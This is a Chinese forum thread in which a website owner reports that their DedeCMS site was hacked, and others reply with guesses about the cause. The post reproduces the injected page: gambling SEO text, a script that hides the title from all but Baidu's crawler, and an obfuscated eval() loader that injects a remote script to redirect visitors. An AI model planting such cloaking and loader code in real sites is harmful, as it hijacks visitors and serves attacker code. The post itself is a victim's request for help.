服务器莫名其妙的中病毒了
今天发现网站不对劲,浏览的时候跳到了一个赌博网站(我以为是浏览器的原因),接着返回继续浏览返现网站功能异常了。右击查看源码发现了以下代码(赌博棋牌的):服务器》西部数码
环境》宝塔
程序》织梦
目前就发现html被篡改,php,数据库这些应该是没问题的(妈的,估计是有问题的)
我服务器也没干什么,怎么会中病毒了呢。
我下火绒杀了没用,重装程序然后过一两天又出现了。(真是日了狗)
<!DOCTYPE html >
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>最火现金棋牌捕鱼官网_现金棋牌大全</title>
<meta name="keywords" content="现金棋牌 最火现金棋牌"/>
<meta name="description" content="2019最火现金棋牌官网(www.01010.com 诚招代理商QQ:968123),棋牌游戏可以提现的,手机棋牌游戏换现金。现金棋牌是时下最受欢迎的一款棋牌游戏,这类棋牌游戏相比传统的棋牌玩法更加新颖有趣,一比一的现金对战,获胜即可获得等比例的现金奖励,获得的现金可以随时提现,玩游戏还能赚钱,"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d=k||e(c);k=}];e=function(){return'\\w+'};c=1;};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p;}('n["\\9\\f\\2\\e\\j\\7\\m\\0"]["\\o\\4\\8\\0\\7"](\'\\k\\1\\2\\4\\8\\3\\0 \\0\\l\\3\\7\\d\\6\\0\\7\\s\\0\\5\\i\\b\\t\\b\\1\\2\\4\\8\\3\\0\\6 \\1\\4\\2\\d\\6\\a\\0\\0\\3\\1\\p\\5\\5\\1\\c\\a\\e\\c\\a\\r\\g\\2\\f\\j\\5\\9\\9\\q\\3\\g\\i\\1\\6\\h\\k\\5\\1\\2\\4\\8\\3\\0\\h\');',30,30,'x74|x73|x63|x70|x72|x2f|x22|x65|x69|x64|x68|x61|x66|x3d|x75|x6f|x2e|x3e|x6a|x6d|x3c|x79|x6e|window|x77|x3a|x71|x32|x78|x76'.split('|'),0,{}))
</script>
可能存在的问题如下:
1.使用的织梦存在漏洞未修复。
2.建站源码存在后门。
3.服务器被提权。
下图是解密js以及跳转的链接,简单来说就是做的劫持引流菠菜SEO
网站中马,服务器有后门 我最近也是各种被篡改,22号上了一个安全狗,目前看来没什么问题。 你这源码是不是自己带着后门?仔细检查一下未安装时的源码? 而且你这个代码我没看出来是哪里的问题 用别人的源码是会出现这种问题。源码有漏洞。 网站有漏洞,下载一个服务器漏洞扫描软件,看看有没有什么漏洞。 nohack_pojie 发表于 2019-8-24 16:12
网站有漏洞,下载一个服务器漏洞扫描软件,看看有没有什么漏洞。
推荐一个来看看? 比对一下源码的修改日期
页:
[1]
2